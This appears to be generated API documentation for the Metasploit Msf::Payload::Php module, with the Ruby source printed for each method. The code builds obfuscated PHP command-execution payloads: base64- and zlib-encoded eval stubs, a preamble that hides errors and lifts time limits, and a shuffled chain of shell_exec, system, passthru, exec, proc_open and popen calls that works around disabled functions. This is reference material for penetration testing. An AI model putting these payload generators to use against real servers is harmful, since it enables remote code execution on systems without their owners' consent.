Module: Msf::Payload::Php
- Included in:
- Exploit::PhpEXE, BindTcp
- Defined in:
- lib/msf/core/payload/php.rb
Defined Under Namespace
Modules: BindTcp, ReverseTcp, SendUUID
Class Method Summary collapse
- .create_exec_stub(php_code, options = {}) ⇒ Object
-
.preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
-
.system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
Instance Method Summary collapse
- #php_create_exec_stub(php_code) ⇒ Object
- #php_exec_cmd(cmd) ⇒ Object
- #php_preamble(options = {}) ⇒ Object
- #php_system_block(options = {}) ⇒ Object
Class Method Details
.create_exec_stub(php_code, options = {}) ⇒ Object
168 169 170 171 172 173 |
# File 'lib/msf/core/payload/php.rb', line 168 def self.create_exec_stub(php_code, = {}) payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code)) b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));" b64_stub = "<?php #{b64_stub} ?>" if .fetch(:wrap_in_tags, true) b64_stub end |
.preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
The generated code will initialize
19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# File 'lib/msf/core/payload/php.rb', line 19 def self.preamble( = {}) vars = .fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) } dis = [:disabled_varname] || vars[:disabled_varname] dis = "$#{dis}" unless dis.start_with?('$') # Canonicalize the list of disabled functions to facilitate choosing a # system-like function later. <<~TEXT /*<?php /**/ @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0); #{dis}=@ini_get('disable_functions'); if(!empty(#{dis})){ #{dis}=preg_replace('/[, ]+/',',',#{dis}); #{dis}=explode(',',#{dis}); #{dis}=array_map('trim',#{dis}); }else{ #{dis}=array(); } TEXT end |
.system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 |
# File 'lib/msf/core/payload/php.rb', line 59 def self.system_block( = {}) vars = .fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) } cmd = [:cmd_varname] || vars[:cmd_varname] dis = [:disabled_varname] || vars[:disabled_varname] output = [:output_varname] || vars[:output_varname] cmd = '$' + cmd unless cmd.start_with?('$') dis = '$' + dis unless dis.start_with?('$') output = '$' + output unless output.start_with?('$') is_callable = vars[:is_callable_varname] in_array = vars[:in_array_varname] setup = '' if [:cmd] setup << <<~TEXT #{cmd}=base64_decode('#{Rex::Text.encode_base64([:cmd])}'); TEXT end setup << <<~TEXT if (FALSE!==stristr(PHP_OS,'win')){ #{cmd}=#{cmd}.\" 2>&1\\n\"; } #{is_callable}='is_callable'; #{in_array}='in_array'; TEXT shell_exec = <<~TEXT if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){ #{output}=`#{cmd}`; }else TEXT passthru = <<~TEXT if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){ ob_start(); passthru(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else TEXT system = <<~TEXT if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){ ob_start(); system(#{cmd}); #{output}=ob_get_contents(); ob_end_clean(); }else TEXT exec = <<~TEXT if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){ #{output}=array(); exec(#{cmd},#{output}); #{output}=join(chr(10),#{output}).chr(10); }else TEXT proc_open = <<~TEXT if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){ $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); } @proc_close($handle); }else TEXT popen = <<~TEXT if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){ $fp=popen(#{cmd},'r'); #{output}=NULL; if(is_resource($fp)){ while(!feof($fp)){ #{output}.=fread($fp,1024); } } @pclose($fp); }else TEXT # Currently unused until we can figure out how to get output with COM # objects (which are not subject to safe mode restrictions) instead of # PHP functions. #win32_com = " # if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { # $wscript = new COM('Wscript.Shell'); # $wscript->run(#{cmd} . ' > %TEMP%\\out.txt'); # #{output} = file_get_contents('%TEMP%\\out.txt'); # }else" fail_block = <<~TEXT { #{output}=0; } TEXT exec_methods = [passthru, shell_exec, system, exec, proc_open, popen] exec_methods = exec_methods.shuffle setup + exec_methods.join("") + fail_block end |
Instance Method Details
#php_create_exec_stub(php_code) ⇒ Object
175 176 177 |
# File 'lib/msf/core/payload/php.rb', line 175 def php_create_exec_stub(php_code) Msf::Payload::PHP.create_exec_stub(php_code) end |
#php_exec_cmd(cmd) ⇒ Object
160 161 162 163 164 165 166 |
# File 'lib/msf/core/payload/php.rb', line 160 def php_exec_cmd(cmd) vars = Rex::RandomIdentifier::Generator.new(language: :php) <<-END_OF_PHP_CODE #{php_preamble(vars_generator: vars)} #{php_system_block(vars_generator: vars, cmd: cmd)} END_OF_PHP_CODE end |
#php_preamble(options = {}) ⇒ Object
41 42 43 |
# File 'lib/msf/core/payload/php.rb', line 41 def php_preamble( = {}) Msf::Payload::Php.preamble() end |
#php_system_block(options = {}) ⇒ Object
156 157 158 |
# File 'lib/msf/core/payload/php.rb', line 156 def php_system_block( = {}) Msf::Payload::Php.system_block() end |